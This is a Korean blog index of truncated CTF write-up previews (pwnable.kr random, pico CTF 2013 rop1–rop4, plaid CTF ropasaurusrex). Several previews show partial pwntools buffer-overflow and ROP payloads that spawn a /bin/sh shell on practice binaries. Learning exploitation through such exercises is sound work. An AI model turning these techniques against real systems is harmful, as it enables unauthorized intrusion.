pwnable(115)
-
pwnable.kr - random
pwn.kr random문제입니다.소스코드를 보면 random값하고 제가 넣은 input하고 xor연산을 통해서 deadbeef와 같으면 flag를 줍니다. 그럼 random값만 알게된다면 쉽게 풀 수 있습니다.random값을 알기위해서 ltrace명령어를 사용합니다. python으로 xor연산을 하면? 그대로 입력하면?(grin)
2018.08.16 -
[pico CTF 2013] rop4
PICO rop4번 마지막문제입니다! ㅎㅎ 이번문제는 소스코드가없으면 풀기 어려워서 소스코드도 같이 첨부하겠습니다. 123456789101112131415161718192021222324252627282930313233343536373839#include #include #include char exec_string[20]; void exec_the_string() { execlp(exec_string, exec_string, NULL);} void call_me_with_cafebabe(int cafebabe) { if (cafebabe == 0xcafebabe) { strcpy(exec_string, "/sh"); }} void call_me_with_two_args(int deadbeef, int ..
2018.08.16 -
[pico CTF 2013] rop3
pico CTF Rop3번문제 (grin) 취약점 분석! 똑..같다 ㅎ하지만 이번에는 shell을 직접 띄어줘야한다 ㅠㅠ 저번에푼rop공룡같이 풀어본다!! 123456789101112131415161718192021222324252627282930313233from pwn import * r = process("./rop3") payload = ""read_plt = 0x08048360read_got = 0x0804a000write_plt = 0x080483a0shell = "/bin/sh"bss = 0x0804a020offset = 0x9ad60pppr = 0x804855d payload += "A"*140payload += p32(read_plt) + p32(pppr) + p32(0) + p32(bs..
2018.08.16 -
[pico CTF 2013] rop2
pico CTF 2013 ROP2번문제입니다.보호기법 체크하기! IDA로 까서 취약점을 찾아보겠습니다. 이전문제하고 똑같은 취약점이군요 ㅎㅎ쉽게 풀릴 것 같아서 not_called함수로 들어가보겠습니다. 어라... "/bin/bash"가 아니라 "/bin/data"로 바뀌어있네요.당황 ㅋㅋㅋㅋ조금더 살펴보니 system함수를 내부에서 호출하니, system함수로 ret를 주고, 인자로 "/bin/sh"를 주면 될 것 같습니다. system주소 찾고, "/bin/bash"가젯 찾고, payload 작성하면? 1234567891011121314151617181920from pwn import * r = process("./rop2")system_plt = 0x80483a0shell = 0x08048610 p..
2018.08.16 -
[pico CTF 2013] rop1
pico ctf rop1번 문제입니다. checksec 하고! 바이너리까보면 취약한 함수라고 손수 알려주는군요 ㅎㅎ88만큼받는데 무려..100을 ㅎㅎ BOF 어떻게 rop를 만들까 생각해보니까 마침 부르지말라는 곳에 shell호출하는 함수가 있네요! :) 그냥 exploit하죠!! 12345678910111213141516171819from pwn import * r = process("./pico_rop1")system = 0x080484A4 payload = "" payload += "A"*140payload += p32(system) r.send(payload)r.interactive() cs (grin)
2018.08.15 -
[plaid CTF] ropasaurusrex
첫번째로 현제 제기준에 조금은 난의도 있는문제를 write-up 쓰게 되었군요 ㅎ3일전까지만해도 ROP가 엄청 헷갈리고그랬는데 exploit-exercise fusion level02문제를풀면서 진짜 많이 도움이 되었던거 같아요 ㅎㅎ level3부터는 자료만들고 이것저것 겹친것들이많아서 조금 지연될 것 같지만 그래도 최대한 빨리 노력해서 풀어볼 예정입니다. (잔말그만하고 본론으로 들어갈게요) ropasaurusrex 문제는 저도 처음에 엄청 힘들어했었기 때문에 개념은 다 알려드리지 못하더라도 명령어와 풀이과정은 모두 알려드리도록 하겠습니다. xD 먼저 ropasaurusrex 바이너리파일을 다운받습니다. 그리고는 가장 먼저 하는일! IDA로 바이너리파일을 까고, 취약점이 어디인지 확인해봅니다! main에..
2018.08.14